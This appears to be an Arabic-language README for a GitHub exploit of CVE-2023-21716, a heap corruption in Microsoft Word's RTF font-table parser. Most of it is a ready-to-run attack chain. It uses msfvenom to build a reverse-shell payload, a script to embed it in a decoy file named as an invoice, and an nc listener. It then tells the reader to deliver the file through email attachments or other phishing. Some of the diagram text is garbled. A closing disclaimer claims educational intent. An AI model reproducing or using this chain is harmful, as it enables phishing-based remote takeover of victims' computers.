
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
الخطورة: حرجة (CVSS 9.8)
المتأثر: Microsoft Word 2013 / 2016 / 2019 / 2021 (غير مصحح)
التصحيح: تحديث الثلاثاء التصحيحي لشهر فبراير 2023 من Microsoft
المؤلف: REGGYRAIDER
CVE-2023-21716 هي ثغرة تلف الكومة في محلل RTF في Microsoft Word (wwlib.dll).
عندما يحلل Word توجيه \fonttbl يحتوي على أكثر من 32,767 إدخال خط، يحدث فيضان عداد موقّع ذي 16 بت، مما يؤدي إلى تلف بيانات الكومة الوصفية. يسمح هذا للمهاجم بتحقيق تنفيذ تعليمات برمجية عن بعد بمجرد إرسال ملف .rtf معدّ للضحية.
لا وحدات ماكرو. لا تفاعل من المستخدم بخلاف فتح الملف.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
قم بالرفع عبر SMB أو مرفق البريد الإلكتروني أو أي ناقل تصيد.
عندما يفتح الضحية ملف invoice_march2024.rtf في Word غير مصحح، تتلقى شل عكسية.
المهاجم ينشئ RTF Word يحلل \fonttbl الكومة تالفة
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl مع 32769+ عداد موقّع ذو 16 بت شيلكود المهاجم
تعريفات خط يفيض ← 0x8000 يعمل
\f<N> داخل \fonttbl.payload.bin) داخل \pict ويهبط في المنطقة المتضررة، مما يحصل على التنفيذ عندما يعالج المخصص ذلك.هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط.
استخدام هذا الاستغلال ضد أنظمة لا تمتلكها أو ليس لديك إذن كتابي صريح لاختبارها هو غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.